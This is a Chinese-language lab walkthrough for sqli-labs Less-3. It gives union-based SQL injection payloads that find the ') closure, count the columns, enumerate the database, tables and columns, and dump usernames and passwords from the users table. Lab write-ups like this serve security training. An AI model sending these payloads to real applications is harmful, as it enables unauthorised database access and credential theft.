SQL注入实例(sqli-labs/less-3)

0、初始页面

1、确定闭合字符

确定为字符型注入

复制代码
?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

复制代码
?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

复制代码
?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

复制代码
?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

复制代码
?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

复制代码
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

复制代码
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

复制代码
?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
qq_4160187220 分钟前
数据分析与科学计算
jvm·数据库·python
奕成则成20 分钟前
Redis String结构详解:从底层原理到实战应用
数据库·redis·缓存
橘子汽水jz_22 分钟前
redis-manger管理平台
数据库·redis·bootstrap
深藏功yu名25 分钟前
Day24(进阶篇):向量数据库 Chroma_FAISS 深度攻坚 —— 索引优化、性能调优与生产级落地
数据库·人工智能·python·ai·agent·faiss·chroma
_evenif44 分钟前
MySql 8 一机多实例部署
linux·数据库·mysql
njidf1 小时前
趣味项目与综合实战
jvm·数据库·python
李昊哲小课1 小时前
PyMySQL完整教程
服务器·数据库·python·pymysql
sqyno1sky1 小时前
Python数据库操作:SQLAlchemy ORM指南
jvm·数据库·python
互联网科技看点1 小时前
2025-2026年研发管理软件推荐:产品研发全流程一体化靠谱解决方案评测
服务器·数据库·人工智能
Yupureki1 小时前
《Linux系统编程》12.基础IO
linux·运维·c语言·开发语言·数据库·c++